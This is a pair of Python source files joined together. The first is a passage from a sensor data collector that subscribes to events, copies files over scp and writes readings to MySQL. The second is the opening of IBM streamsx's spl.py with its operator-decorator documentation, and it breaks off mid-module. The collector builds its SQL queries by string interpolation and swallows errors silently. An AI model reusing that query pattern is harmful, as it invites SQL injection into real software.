                # Copy today's buffer file from the MARTAS machine via scp.
                scptransfer(sshcred[0]+'@'+clientip+':'+datafile,destfile,sshcred[1],timeout=120)
                print("collectors client: copying evetually existing data file to local directory {}".format(destfile))
                try:
                    stream = st.read(destfile)
                    print("collectors client: Reading with MagPy... Found: {} datapoints".format(stream.length()[0]))
                    # Fill minimal meta information before the DB upload.
                    stream.header['StationID'] = self.stationid
                    stream.header['SensorModule'] = sensorshort
                    try:
                        # Last four characters are assumed to hold the revision.
                        stream.header['SensorRevision'] = sensorid[-4:]
                    except:
                        print("collectors client: Could not extract revision number for %s" % sensorid)
                        pass
                    try:
                        # Second-to-last underscore field is assumed to be the serial number.
                        stream.header['SensorSerialNum'] = sensorid.split('_')[-2]
                    except:
                        print("collectors client: Could not extract serial number for %s" % sensorid)
                        pass
                    if not len(stream.ndarray[0]) > 0:
                        # Convert old line-structure data to ndarray before writing.
                        stream = stream.linestruct2ndarray()
                    stream2db(self.db,stream)
                except:
                    # Best effort: a missing file or ssh key leaves the DB untouched.
                    print("collectors client: Could not upload data to the data base - subscription failed")
                    print(" : possible reason: no ssh key established so far?")
        else:
            print("collectors client: Found sensor(s) in DB - subscribing to the highest revision number")
        subscriptionstring = "%s:%s-value" % (module, sensorid)
        print("collectors sensor client: Subscribing: ", subscriptionstring)
        self.subscribe(subscriptionstring, self.onEvent)
    elif output == 'file':
        # NOTE(review): loops over the module-level global 'o' but always uses
        # 'sensorid', so each extra iteration repeats the identical
        # subscription — verify whether 'row' was intended here.
        for row in o:
            print("collectors client: Running for sensor", sensorid)
            subscriptionstring = "%s:%s-value" % (module, sensorid)
            self.subscribe(subscriptionstring, self.onEvent)
def subscribeInst(self, db, cursor, client, mod, output):
    """
    Main Method for Subscribing:
    calls subscribeSensor and subscribeOw

    Derives the component type (self.typ) and the protocol module name
    (self.module) from the first three characters of the sensor id, then
    dispatches to the OneWire or single-sensor subscription path.
    """
    sensshort = mod[:3]
    # Component type by sensor family; anything unrecognised is 'unknown'.
    family_typ = {
        'GSM': 'f', 'POS': 'f', 'G82': 'f',
        'LEM': 'xyz', 'FGE': 'xyz',
        'ENV': 'env',
    }
    self.typ = family_typ.get(sensshort, 'unknown')
    # Families whose protocol module name differs from the lower-cased code.
    special_module = {
        'G82': 'cs',
        'POS': 'pos1',
        'KER': 'kern',
        'LEM': 'lemi',
        'GP2': 'sug',
        'BM3': 'bm3',
    }
    module = special_module.get(sensshort, sensshort.lower())
    self.module = module
    if module == 'ow':
        # OneWire bus: subscribe every sensor listed in the global 'o'.
        if len(o) < 1:
            print('collectors client: No OW sensors available')
        else:
            print('Subscribing all OneWire Sensors ...')
            self.subscribeOw(client, output, module, o)
    else:
        self.subscribeSensor(client, output, module, sensshort, mod)
def convertUnicode(self, data):
    """
    Recursively convert any unicode strings inside ``data`` to native ``str``.

    Works on arbitrarily nested mappings and iterables (dicts, lists,
    tuples, ...); non-string scalars are returned unchanged.  Based on a
    recipe by Richie Hindle, fixed to run on both Python 2 and Python 3:

    * ``unicode`` only exists on Python 2,
    * the ABCs moved to ``collections.abc`` (removed from ``collections``
      in Python 3.10),
    * ``dict.iteritems`` was removed in Python 3.
    """
    # Resolve version-specific names once per call.
    try:
        from collections import abc as _abc          # Python 3
    except ImportError:
        import collections as _abc                   # Python 2
    try:
        _text = unicode                              # Python 2
    except NameError:
        _text = str                                  # Python 3

    def _conv(value):
        if isinstance(value, _text):
            return str(value)
        if isinstance(value, str):
            # Already a native str (Python 3, or Python 2 bytes-str).
            return value
        if isinstance(value, _abc.Mapping):
            return dict((_conv(k), _conv(v)) for k, v in value.items())
        if isinstance(value, _abc.Iterable):
            # Rebuild the container with the same type (list, tuple, set...).
            return type(value)(map(_conv, value))
        return value

    return _conv(data)
def storeDataLine(self, row, paralst,revnumber='0001'):
    """
    Function which read a row coming from the subscribe command
    and writes the data to a file or database

    Parameters:
        row       : (list) [sensorid, module, values]; values is a list whose
                    first element is a timestamp string
        paralst   : (list) column/key names, first entry 'time'
        revnumber : (str) revision suffix for the DB table (default '0001')

    Depending on ``self.output`` the row is either packed into the MagPy
    binary buffer-file format ('file') or appended to the sensor's data
    table in MySQL (anything else).
    """
    # row layout: [sensorid, module, list-of-values (time first)]
    sensorid = row[0]
    module = row[1]
    line = row[2]
    if self.output == 'file':
        # missing namelst, unitlst and multilst - create dicts for that based on STANDARD
        packcode = '6hL'        # pack code for the 6+1 timestamp components
        multiplier = 100000     # values are stored as scaled integers
        namelst = [elem for elem in NAMEDICT[module]]
        unitlst = [elem for elem in UNITDICT[module]]
        if module == 'ow':
            # TODO
            # OneWire sensors report a variable number of values; pick the
            # matching column layout from the observed line length.
            if not len(line) == len(paralst):
                if len(line) == 2:
                    paralst = ['time','t1']
                    namelst = ['T']
                    unitlst = ['degC']
                elif len(line) == 5:
                    paralst = ['time','t1','var1','var2','var3','var4']
                    namelst = ['T','RH_P','VDD','VAD','VIS']
                    unitlst = ['degC','percent_mBar','V','V','V']
            # check length of paralst and self.line
        else:
            pass
        # One 'l' pack slot per data key (everything after 'time').
        keylst = paralst[1:]
        packcode = packcode + 'l'*len(keylst)
        multilst = [multiplier]*len(keylst)
        if not len(line) == len(paralst):
            # Output only for testing purpose if you dont want to smash your logs
            #print("ERRRRRRRRRRRRRRRRRRRRROR")
            self.line = []
        else:
            # First element is the timestamp, the rest are scaled to ints.
            for i, elem in enumerate(line):
                if i == 0:
                    datearray = timeToArray(line[0])
                else:
                    datearray.append(int(line[i]*multiplier))
            day = datetime.strftime((datetime.strptime(line[0],"%Y-%m-%d %H:%M:%S.%f")),'%Y-%m-%d')
            line = []
            try:
                # Self-describing MagPyBin header followed by the packed record.
                header = "# MagPyBin %s %s %s %s %s %s %d" % (sensorid, str(keylst), str(namelst), str(unitlst), str(multilst), packcode, struct.calcsize(packcode))
                data_bin = struct.pack(packcode,*datearray)
                dataToFile(os.path.join(destpath,'MartasFiles'), sensorid, day, data_bin, header)
            except:
                #print("error")
                pass
    else:
        """
        Please note:
        Data is always automatically appended to datainfoid 0001
        """
        if module == 'ow':
            # DB request is necessary as sensorid has no revision information
            sql = "SELECT SensorID, SensorGroup, SensorType FROM SENSORS WHERE SensorID LIKE '%s%%'" % sensorid
            self.cursor.execute(sql)
            results = self.cursor.fetchall()
            # Use the most recently registered matching sensor.
            sid = results[-1][0]
            sgr = results[-1][1]
            sty = results[-1][2]
            datainfoid = sid+'_'+revnumber
            # Column layout by OneWire chip type.
            if sty == 'DS18B20':
                paralst = ['time','t1']
            elif sty == 'DS2438':
                if sgr == 'humidity':
                    paralst = ['time', 't1', 'var1', 'var2', 'var3', 'var4']
                elif sgr == 'pressure':
                    paralst = ['time', 't1', 'var1', 'var2', 'var3', 'var4']
                else:
                    paralst = ['time', 't1', 'var1', 'var2', 'var3', 'var4']
            self.typ = 'ow'
        else:
            datainfoid = sensorid+'_0001'
        # define insert from provided param
        parastr = ', '.join(paralst)
        # separate floats and string
        # NOTE(review): the INSERT is assembled by string interpolation, not
        # parameterized queries; acceptable only because the values originate
        # from the trusted sensor stream.
        nelst = []
        for elem in line:
            if isinstance(elem, str):
                elem = "'"+elem+"'"
            nelst.append(elem)
        linestr = ', '.join(map(str, nelst))
        sql = "INSERT INTO %s(%s) VALUES (%s)" % (datainfoid, parastr, linestr)
        if printdata:
            print("!!!!!!!!!!!!!!!! SQL !!!!!!!!!!!!!!", sql)
        self.line = []
        # Prepare SQL query to INSERT a record into the database.
        try:
            # Execute the SQL command
            self.cursor.execute(sql)
            # Commit your changes in the database
            self.db.commit()
        except:
            # No regular output here. Otherwise log-file will be smashed
            #print("client: could not append data to table")
            # Rollback in case there is any error
            self.db.rollback()
def storeData(self, array, paralst):
    """Persist every buffered row in ``array`` via :meth:`storeDataLine`."""
    for entry in array:
        self.storeDataLine(entry, paralst)
def sortAndFilter(self, array):
    """Placeholder for grouping the buffer by sensor id and filtering it.

    Intended behaviour (not implemented yet):
      1) sort ``array`` into sub-arrays with identical sensor ids,
      2) filter each sub-array and save it.
    Currently it only echoes a shallow copy of the first buffered row.
    """
    head = array[0][:]
    print(head)
def onEvent(self, topicUri, event):
    """
    Callback invoked for every event received on a subscribed topic.

    Parses sensor id and module from ``topicUri``, accumulates single value
    events into ``self.line`` until an end-of-line event (id 99) arrives,
    then buffers the completed row and either stores it immediately
    (``self.savedirectly``) or flushes the buffer in batches of 90 rows via
    two worker processes (store + sort/filter).

    Bug fixed: the millisecond clamp used ``millsec == 999000`` (a no-op
    comparison) where an assignment was intended.
    """
    eventdict = self.convertUnicode(event)
    time = ''   # NOTE(review): assigned but never used below
    eol = ''
    try:
        sensorid = topicUri.split('/')[-1].split('-')[0].split('#')[1]
        module = topicUri.split('/')[-1].split('-')[0].split('#')[0]
        #print sensorid, module
        if module.startswith('pos') or module.startswith('gsm') or module.startswith('cs'):
            self.typ = 'f'
        if eventdict['id'] == 99:
            # id 99 marks the end-of-line event for the current record.
            eol = eventdict['value']
        if eol == '':
            # Still collecting values for the current record.
            if eventdict['id'] in MODIDDICT[module]: # replace by some eol parameter
                if eventdict['id']==1: # round time to milliseconds
                    ar = eventdict['value'].split('.')
                    millsec= int(np.round(int(ar[1])/1000.)*1000.)
                    if millsec >= 1000000: ## accept up to one millisec error here
                        # BUGFIX: was 'millsec == 999000' (comparison, no
                        # effect); clamp to the largest valid microsecond value.
                        millsec = 999000
                    self.line.append(ar[0]+'.'+str(millsec).zfill(6))
                else:
                    self.line.append(eventdict['value'])
        else:
            # End-of-line received: build the parameter list for this module.
            paralst = []
            for elem in MODIDDICT[module]:
                var = IDDICT[elem]
                if var == 'time' and 'time' in paralst:
                    var = 'sectime'
                paralst.append(var)
            if printdata:
                print("Received from %s: %s" % (sensorid,str(self.line)))
            row = [sensorid, module, self.line]
            self.bufferarray.append(row)
            # Keep the in-memory buffer bounded to the last 100 rows.
            if len(self.bufferarray) > 100:
                self.bufferarray = self.bufferarray[-100:]
            self.count += 1
            self.line=[]
            #self.savedirectly = False
            critvalue = 90
            if self.savedirectly:
                self.count = 0
                array = self.bufferarray[-1:]
                self.storeData(array,paralst)
                # if filter:
                # add a filter function after 100 to 1000 steps?
            else:
                if self.count == critvalue:
                    # Begin of buffered save
                    begin = datetime.utcnow()
                    array = self.bufferarray[-self.count:]
                    print("Lengths", len(array), self.count)
                    self.count = 0
                    #self.storeData(array,paralst)
                    # Store and sort/filter the batch in parallel processes.
                    p1 = multiprocessing.Process(target=self.storeData, args=(array,paralst,))
                    p2 = multiprocessing.Process(target=self.sortAndFilter, args=(array,))
                    p1.start()
                    p2.start()
                    p1.join()
                    p2.join()
                    print("Duration of buffered save", datetime.utcnow()-begin)
    except:
        # Deliberately swallow everything: a malformed event must not kill the
        # collector, and per-event error output would flood the log files.
        pass
|
spl.py | # coding=utf-8
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2015,2019
"""
SPL Python primitive operators.
********
Overview
********
SPL primitive operators that call a Python function or
class methods are created by decorators provided by this module.
The name of the function or callable class becomes the name of the
operator.
A decorated function is a stateless operator while a decorated class
is an optionally stateful operator.
These are the supported decorators that create an SPL operator:
* :py:class:`@spl.source <source>` - Creates a source operator that produces tuples.
* :py:class:`@spl.filter <filter>` - Creates an operator that filters tuples.
* :py:class:`@spl.map <map>` - Creates an operator that maps input tuples to output tuples.
* :py:class:`@spl.for_each <for_each>` - Creates an operator that terminates a stream processing each tuple.
* :py:class:`@spl.primitive_operator <primitive_operator>` - Creates an SPL primitive operator that has an arbitrary number of input and output ports.
Decorated functions and classes must be located in the directory
``opt/python/streams`` in the SPL toolkit. Each module in that directory
will be inspected for operators during extraction. Each module defines
the SPL namespace for its operators by the function ``spl_namespace``,
for example::
from streamsx.spl import spl
def spl_namespace():
return 'com.example.ops'
@spl.map()
def Pass(*tuple_):
return tuple_
creates a pass-through operator ``com.example.ops::Pass``.
SPL primitive operators are created by executing the extraction script :ref:`spl-py-extract` against the SPL toolkit. Once created the operators become part
of the toolkit and may be used like any other SPL operator.
*******************************
Python classes as SPL operators
*******************************
Overview
========
Decorating a Python class creates a stateful SPL operator
where the instance fields of the class are the operator's state. An instance
of the class is created when the SPL operator invocation is initialized
at SPL runtime. The instance of the Python class is private to the SPL
operator and is maintained for the lifetime of the operator.
If the class has instance fields then they are the state of the
operator and are private to each invocation of the operator.
If the `__init__` method has parameters beyond the first
`self` parameter then they are mapped to operator parameters.
Any parameter that has a default value becomes an optional parameter
to the SPL operator. Parameters of the form `\*args` and `\*\*kwargs`
are not supported.
.. warning::
Parameter names must be valid SPL identifiers,
SPL identifiers start with an ASCII letter or underscore,
followed by ASCII letters, digits, or underscores.
The name also must not be an SPL keyword.
Parameter names ``suppress`` and ``include`` are reserved.
The value of the operator parameters at SPL operator invocation are passed
to the `__init__` method. This is equivalent to creating an instance
of the class passing the operator parameters into the constructor.
For example, with this decorated class producing an SPL source
operator::
@spl.source()
class Range(object):
def __init__(self, stop, start=0):
self.start = start
self.stop = stop
def __iter__(self):
return zip(range(self.start, self.stop))
The SPL operator `Range` has two parameters, `stop` is mandatory and `start` is optional, defaulting to zero. Thus the SPL operator may be invoked as::
// Produces the sequence of values from 0 to 99
//
// Creates an instance of the Python class
// Range using Range(100)
//
stream<int32 seq> R = Range() {
param
stop: 100;
}
or both operator parameters can be set::
// Produces the sequence of values from 50 to 74
//
// Creates an instance of the Python class
// Range using Range(75, 50)
//
stream<int32 seq> R = Range() {
param
start: 50;
stop: 75;
}
Operator state
==============
Use of a class allows the operator to be stateful by maintaining state in instance
attributes across invocations (tuple processing).
When the operator is in a consistent region or checkpointing then it is serialized using `dill`. The default serialization may be modified by using the standard Python pickle mechanism of ``__getstate__`` and ``__setstate__``. This is required if the state includes objects that cannot be serialized, for example file descriptors. For details see https://docs.python.org/3.5/library/pickle.html#handling-stateful-objects .
If the class has ``__enter__`` and ``__exit__`` context manager methods then ``__enter__`` is called after the instance has been deserialized by `dill`. Thus ``__enter__`` is used to recreate runtime objects that cannot be serialized such as open files or sockets.
Operator initialization & shutdown
==================================
Execution of an instance for an operator effectively run in a context manager so that an instance's ``__enter__``
method is called when the processing element containing the operator is initialized
and its ``__exit__`` method called when the processing element is stopped. To take advantage of this
the class must define both ``__enter__`` and ``__exit__`` methods.
.. note::
Initialization such as opening files should be in ``__enter__``
in order to support stateful operator restart & checkpointing.
Example of using ``__enter__`` and ``__exit__`` to open and close a file::
import streamsx.ec as ec
@spl.map()
class Sentiment(object):
def __init__(self, name):
self.name = name
self.file = None
def __enter__(self):
self.file = open(self.name, 'r')
def __exit__(self, exc_type, exc_value, traceback):
if self.file is not None:
self.file.close()
def __call__(self):
pass
When an instance defines a valid ``__exit__`` method then it will be called with an exception when:
* the instance raises an exception during processing of a tuple
* a data conversion exception is raised converting a Python value to an SPL tuple or attribute
If ``__exit__`` returns a true value then the exception is suppressed and processing continues, otherwise the enclosing processing element will be terminated.
Application log and trace
=========================
IBM Streams provides application trace and log services which are
accessible through standard Python loggers from the `logging` module.
See :ref:`streams_app_log_trc`.
*********************************
Python functions as SPL operators
*********************************
Decorating a Python function creates a stateless SPL operator.
In SPL terms this is similar to an SPL Custom operator, where
the code in the Python function is the custom code. For
operators with input ports the function is called for each
input tuple, passing a Python representation of the SPL input tuple.
For an SPL source operator the function is called to obtain an iterable
whose contents will be submitted to the output stream as SPL tuples.
Operator parameters are not supported.
An example SPL sink operator that prints each input SPL tuple after
its conversion to a Python tuple::
@spl.for_each()
def PrintTuple(*tuple_):
"Print each tuple to standard out."
print(tuple_, flush=True)
.. _spl-tuple-to-python:
*******************************
Processing SPL tuples in Python
*******************************
SPL tuples are converted to Python objects and passed to a decorated callable.
Overview
========
For each SPL tuple arriving at an input port a Python function is called with
the SPL tuple converted to Python values suitable for the function call.
How the tuple is passed is defined by the tuple passing style.
Tuple Passing Styles
====================
An input tuple can be passed to Python function using a number of different styles:
* *dictionary*
* *tuple*
* *attributes by name* **not yet implemented**
* *attributes by position*
Dictionary
----------
Passing the SPL tuple as a Python dictionary is flexible
and makes the operator independent of any schema.
A disadvantage is the reduction in code readability
for Python function by not having formal parameters,
though getters such as ``tuple['id']`` mitigate that to some extent.
If the function is general purpose and can derive meaning
from the keys that are the attribute names then ``**kwargs`` can be useful.
When the only function parameter is ``**kwargs``
(e.g. ``def myfunc(**tuple_):``) then the passing style is *dictionary*.
All of the attributes are passed in the dictionary
using the SPL schema attribute name as the key.
Tuple
-----
Passing the SPL tuple as a Python tuple is flexible
and makes the operator independent of any schema
but is brittle to changes in the SPL schema.
Another disadvantage is the reduction in code readability
for Python function by not having formal parameters.
However if the function is general purpose and independent
of the tuple contents ``*args`` can be useful.
When the only function parameter is ``*args``
(e.g. ``def myfunc(*tuple_):``) then the passing style is *tuple*.
All of the attributes are passed as a Python tuple
with the order of values matching the order of the SPL schema.
Attributes by name
------------------
(**not yet implemented**)
Passing attributes by name can be robust against changes
in the SPL scheme, e.g. additional attributes being added in
the middle of the schema, but does require that the SPL schema
has matching attribute names.
When *attributes by name* is used then SPL tuple attributes
are passed to the function by name for formal parameters.
Order of the attributes and parameters need not match.
This is supported for function parameters of
kind ``POSITIONAL_OR_KEYWORD`` and ``KEYWORD_ONLY``.
If the function signature also contains a parameter of the form
``**kwargs`` (``VAR_KEYWORD``) then any attributes not bound to
formal parameters are passed in its dictionary using the
SPL schema attribute name as the key.
If the function signature also contains an arbitrary argument
list ``*args`` then any attributes not bound to formal parameters
or to ``**kwargs`` are passed in order of the SPL schema.
If there are only formal parameters any non-bound attributes
are not passed into the function.
Attributes by position
----------------------
Passing attributes by position allows the SPL operator to
be independent of the SPL schema but is brittle to
changes in the SPL schema. For example a function expecting
an identifier and a sensor reading as the first two attributes
would break if an attribute representing region was added as
the first SPL attribute.
When *attributes by position* is used then SPL tuple attributes are
passed to the function by position for formal parameters.
The first SPL attribute in the tuple is passed as the first parameter.
This is supported for function parameters of kind `POSITIONAL_OR_KEYWORD`.
If the function signature also contains an arbitrary argument
list `\*args` (`VAR_POSITIONAL`) then any attributes not bound
to formal parameters are passed in order of the SPL schema.
The function signature must not contain a parameter of the form
``**kwargs`` (`VAR_KEYWORD`).
If there are only formal parameters any non-bound attributes
are not passed into the function.
The SPL schema must have at least the number of positional arguments
the function requires.
Selecting the style
===================
For signatures only containing a parameter of the form
``*args`` or ``**kwargs`` the style is implicitly defined:
* ``def f(**tuple_)`` - *dictionary* - ``tuple_`` will contain a dictionary of all of the SPL tuple attribute's values with the keys being the attribute names.
* ``def f(*tuple_)`` - *tuple* - ``tuple_`` will contain all of the SPL tuple attribute's values in order of the SPL schema definition.
Otherwise the style is set by the ``style`` parameter to the decorator,
defaulting to *attributes by name*. The style value can be set to:
* ``'name'`` - *attributes by name* (the default)
* ``'position'`` - *attributes by position*
Examples
========
These examples show how an SPL tuple with the schema and value::
tuple<rstring id, float64 temp, boolean increase>
{id='battery', temp=23.7, increase=true}
is passed into a variety of functions by showing the effective Python
call and the resulting values of the function's parameters.
*Dictionary* consuming all attributes by ``**kwargs``::
@spl.map()
def f(**tuple_)
pass
# f({'id':'battery', 'temp':23.7, 'increase': True})
# tuple_={'id':'battery', 'temp':23.7, 'increase':True}
*Tuple* consuming all attributes by ``*args``::
@spl.map()
def f(*tuple_)
pass
# f('battery', 23.7, True)
# tuple_=('battery',23.7, True)
*Attributes by name* consuming all attributes::
@spl.map()
def f(id, temp, increase)
pass
# f(id='battery', temp=23.7, increase=True)
# id='battery'
# temp=23.7
# increase=True
*Attributes by name* consuming a subset of attributes::
@spl.map()
def f(id, temp)
pass
# f(id='battery', temp=23.7)
# id='battery'
# temp=23.7
*Attributes by name* consuming a subset of attributes in a different order::
@spl.map()
def f(increase, temp)
pass
# f(temp=23.7, increase=True)
# increase=True
# temp=23.7
*Attributes by name* consuming `id` by name and remaining attributes by ``**kwargs``::
@spl.map()
def f(id, **tuple_)
pass
# f(id='battery', {'temp':23.7, 'increase':True})
# id='battery'
# tuple_={'temp':23.7, 'increase':True}
*Attributes by name* consuming `id` by name and remaining attributes by ``*args``::
@spl.map()
def f(id, *tuple_)
pass
# f(id='battery', 23.7, True)
# id='battery'
# tuple_=(23.7, True)
*Attributes by position* consuming all attributes::
@spl.map(style='position')
def f(key, value, up)
pass
# f('battery', 23.7, True)
# key='battery'
# value=23.7
# up=True
*Attributes by position* consuming a subset of attributes::
@spl.map(style='position')
def f(a, b)
pass
# f('battery', 23.7)
# a='battery'
# b=23.7
*Attributes by position* consuming `id` by position and remaining attributes by ``*args``::
@spl.map(style='position')
def f(key, *tuple_)
pass
# f('battery', 23.7, True)
# key='battery'
# tuple_=(23.7, True)
In all cases the SPL tuple must be able to provide all parameters
required by the function. If the SPL schema is insufficient then
an error will result, typically an SPL compile time error.
The SPL schema can provide a subset of the formal parameters if the
remaining attributes are optional (having a default).
*Attributes by name* consuming a subset of attributes with an optional parameter not matched by the schema::
@spl.map()
def f(id, temp, pressure=None)
pass
# f(id='battery', temp=23.7)
# id='battery'
# temp=23.7
# pressure=None
.. _submit-from-python:
************************************
Submission of SPL tuples from Python
************************************
The return from a decorated callable results in submission of SPL tuples
on the associated output port.
A Python function must return:
* ``None``
* a Python tuple
* a Python dictionary
* a list containing any of the above.
None
====
When ``None`` is return then no tuple will be submitted to
the operator output port.
Python tuple
============
When a Python tuple is returned it is converted to an SPL tuple and
submitted to the output port.
The values of a Python tuple are assigned to an output SPL tuple by position,
so the first value in the Python tuple is assigned to the first attribute
in the SPL tuple::
# SPL input schema: tuple<int32 x, float64 y>
# SPL output schema: tuple<int32 x, float64 y, float32 z>
@spl.map(style='position')
def myfunc(a,b):
return (a,b,a+b)
# The SPL output will be:
# All values explicitly set by returned Python tuple
# based on the x,y values from the input tuple
# x is set to: x
# y is set to: y
# z is set to: x+y
The returned tuple may be *sparse*, any attribute value in the tuple
that is ``None`` will be set to their SPL default or copied from
a matching attribute in the input tuple
(same name and type,
or same name and same type as the underlying type of an output attribute
with an optional type),
depending on the operator kind::
# SPL input schema: tuple<int32 x, float64 y>
# SPL output schema: tuple<int32 x, float64 y, float32 z>
@spl.map(style='position')
def myfunc(a,b):
return (a,None,a+b)
# The SPL output will be:
# x is set to: x (explicitly set by returned Python tuple)
# y is set to: y (set by matching input SPL attribute)
# z is set to: x+y
When a returned tuple has fewer values than attributes in the SPL output
schema the attributes not set by the Python function will be set
to their SPL default or copied from
a matching attribute in the input tuple
(same name and type,
or same name and same type as the underlying type of an output attribute
with an optional type),
depending on the operator kind::
# SPL input schema: tuple<int32 x, float64 y>
# SPL output schema: tuple<int32 x, float64 y, float32 z>
@spl.map(style='position')
def myfunc(a,b):
return a,
# The SPL output will be:
# x is set to: x (explicitly set by returned Python tuple)
# y is set to: y (set by matching input SPL attribute)
# z is set to: 0 (default int32 value)
When a returned tuple has more values than attributes in the SPL output schema then the additional values are ignored::
# SPL input schema: tuple<int32 x, float64 y>
# SPL output schema: tuple<int32 x, float64 y, float32 z>
@spl.map(style='position')
def myfunc(a,b):
return (a,b,a+b,a/b)
# The SPL output will be:
# All values explicitly set by returned Python tuple
# based on the x,y values from the input tuple
# x is set to: x
# y is set to: y
# z is set to: x+y
#
# The fourth value in the tuple a/b = x/y is ignored.
Python dictionary
=================
A Python dictionary is converted to an SPL tuple for submission to
the associated output port. An SPL attribute is set from the
dictionary if the dictionary contains a key equal to the attribute
name. The value is used to set the attribute, unless the value is
``None``.
If the value in the dictionary is ``None``, or no matching key exists,
then the attribute value is set to its SPL default or copied from
a matching attribute in the input tuple (same name and type,
or same name and same type as the underlying type of an output attribute
with an optional type), depending on the operator kind.
Any keys in the dictionary that do not map to SPL attribute names are ignored.
Python list
===========
When a list is returned, each value is converted to an SPL tuple and
submitted to the output port, in order of the list starting with the
first element (position 0). If the list contains `None` at an index
then no SPL tuple is submitted for that index.
The list must only contain Python tuples, dictionaries or `None`. The list
can contain a mix of valid values.
The list may be empty resulting in no tuples being submitted.
"""
from enum import Enum
__all__ = ['source', 'map', 'filter', 'for_each', 'PrimitiveOperator', 'input_port', 'primitive_operator', 'extracting', 'ignore']
import functools
import inspect
import re
import sys
import streamsx.ec as ec
import streamsx._streams._runtime
import importlib
import warnings
import streamsx._streams._version
__version__ = streamsx._streams._version.__version__
# Used to recreate instances of decorated operators
# from their module & class name during pickleling (dill)
# See __reduce__ implementation below
def _recreate_op(op_module, op_name):
module_ = importlib.import_module(op_module)
class_ = getattr(module_, op_name)
return class_.__new__(class_)
# Internal classification of the SPL operator kinds produced by the
# decorators in this module.  Each generated kind carries the name of the
# SPL code-generation template used for it; 'Ignore' gets no template
# (presumably because ignored callables produce no operator — see usage).
_OperatorType = Enum('_OperatorType', 'Ignore Source Sink Pipe Filter Primitive')
_OperatorType.Source.spl_template = 'PythonFunctionSource'
_OperatorType.Pipe.spl_template = 'PythonFunctionPipe'
_OperatorType.Sink.spl_template = 'PythonFunctionSink'
_OperatorType.Filter.spl_template = 'PythonFunctionFilter'
_OperatorType.Primitive.spl_template = 'PythonPrimitive'
_SPL_KEYWORDS = {'as', 'attribute',
'blob', 'boolean', 'break',
'complex32', 'complex64', 'composite', 'config', 'continue',
'decimal128', 'decimal32', 'decimal64', 'do',
'else', 'enum', 'expression',
'false', 'float32', 'float64', 'for', 'function',
'graph',
'if', 'in', 'input', 'int', 'int16', 'int32', 'int64', 'int8',
'list', 'logic',
'map', 'mutable',
'namespace', 'null',
'onProcess', 'onPunct', 'onTuple', 'operator', 'optional', 'output',
'param', 'public',
'return', 'rstring',
'set', 'state', 'stateful', 'static', 'stream', 'streams',
'timestamp', 'true', 'tuple', 'type',
'uint16', 'uint32', 'uint64', 'uint8', 'use', 'ustring',
'void',
'while', 'window',
'xml'}
def _is_identifier(id):
return re.match('^[a-zA-Z_][a-zA-Z_0-9]*$', id) and id not in _SPL_KEYWORDS
def _valid_identifier(id):
if not _is_identifier(id):
raise ValueError("{0} is not a valid SPL identifier".format(id))
def _valid_op_parameter(name):
_valid_identifier(name)
if name in ['suppress', 'include']:
raise ValueError("Parameter name {0} is reserved".format(name))
# Flag flipped to True by the spl-python-extract tooling while it imports
# operator modules to discover signatures; user code queries it via
# extracting() below.
_EXTRACTING=False

def extracting():
    """Is a module being loaded by ``spl-python-extract``.

    This can be used by modules defining SPL primitive operators
    using decorators such as :py:class:`@spl.map <map>`, to avoid
    runtime behavior. Typically not importing modules that are
    not available locally. The extraction script loads the module
    to determine method signatures and thus does not invoke any methods.

    For example if an SPL toolkit with primitive operators requires
    a package ``extras`` and is using ``opt/python/streams/requirements.txt``
    to include it, then loading it at extraction time can be avoided by::

        from streamsx.spl import spl

        def spl_namespace():
            return 'myns.extras'

        if not spl.extracting():
            import extras

        @spl.map():
        def myextras(*tuple_):
            return extras.process(tuple_)

    .. versionadded:: 1.11
    """
    return _EXTRACTING
#
# Wrap object for an SPL operator, either
# a callable class or function.
#
def _wrapforsplop(optype, wrapped, style, docpy):
    """Wrap a decorated callable (class or function) as an SPL operator.

    Attaches the ``_splpy_*`` metadata the extraction script and the SPL
    runtime read: operator type, callable kind, tuple-passing style, fixed
    parameter count, defining source file and whether Python docs are
    generated.

    Parameters:
        optype  : member of ``_OperatorType`` (Source/Sink/Pipe/Filter/...)
        wrapped : the decorated class or function
        style   : tuple passing style requested by the decorator (or None)
        docpy   : whether to include Python docstrings in generated SPL docs

    Returns the wrapping class (a subclass of ``wrapped``) or the function
    itself with metadata attributes set.
    """
    if inspect.isclass(wrapped):
        if not callable(wrapped):
            raise TypeError('Class must be callable')
        _valid_identifier(wrapped.__name__)
        # Subclass the user's class so the operator instance keeps the user's
        # behaviour while carrying the SPL metadata as class attributes.
        class _op_class(wrapped):
            __doc__ = wrapped.__doc__
            _splpy_wrapped = wrapped
            _splpy_optype = optype
            _splpy_callable = 'class'
            _streamsx_ec_cls = True
            _streamsx_ec_context = streamsx._streams._runtime._has_context_methods(wrapped)
            @functools.wraps(wrapped.__init__)
            def __init__(self,*args,**kwargs):
                super(_op_class, self).__init__(*args,**kwargs)
                # Tracks whether __enter__ has run for context-manager support.
                self._streamsx_ec_entered = False
            # Use reduce to save the state of the class and its
            # module and operator name.
            def __reduce__(self):
                # Serialize as (recreate-callable, (module, name), state) so
                # dill can rebuild the instance without calling __init__.
                if hasattr(self, '__getstate__'):
                    state = self.__getstate__()
                else:
                    state = self.__dict__
                return _recreate_op, (wrapped.__module__, wrapped.__name__), state
        # Only tuple-consuming operators have a passing style / fixed count.
        if optype in (_OperatorType.Sink, _OperatorType.Pipe, _OperatorType.Filter):
            _op_class._splpy_style = _define_style(wrapped, wrapped.__call__, style)
            _op_class._splpy_fixed_count = _define_fixed(_op_class, _op_class.__call__)
        else:
            _op_class._splpy_style = ''
            _op_class._splpy_fixed_count = -1
        _op_class._splpy_file = inspect.getsourcefile(wrapped)
        _op_class._splpy_docpy = docpy
        return _op_class
    if not inspect.isfunction(wrapped):
        raise TypeError('A function or callable class is required')
    _valid_identifier(wrapped.__name__)
    #fnstyle =
    #if fnstyle == 'tuple':
    #    @functools.wraps(wrapped)
    #    def _op_fn(*args):
    #        return wrapped(args)
    #else:
    #    @functools.wraps(wrapped)
    #    def _op_fn(*args, **kwargs):
    #        return wrapped(*args, **kwargs)
    # Functions are used directly; metadata is attached as attributes.
    _op_fn = wrapped
    _op_fn._splpy_optype = optype
    _op_fn._splpy_callable = 'function'
    _op_fn._splpy_style = _define_style(_op_fn, _op_fn, style)
    _op_fn._splpy_fixed_count = _define_fixed(_op_fn, _op_fn)
    _op_fn._splpy_file = inspect.getsourcefile(wrapped)
    _op_fn._splpy_docpy = docpy
    _op_fn._streamsx_ec_cls = False
    _op_fn._streamsx_ec_context = False
    return _op_fn
# Define the SPL tuple-passing style based upon the function
# signature and the decorator's style parameter.
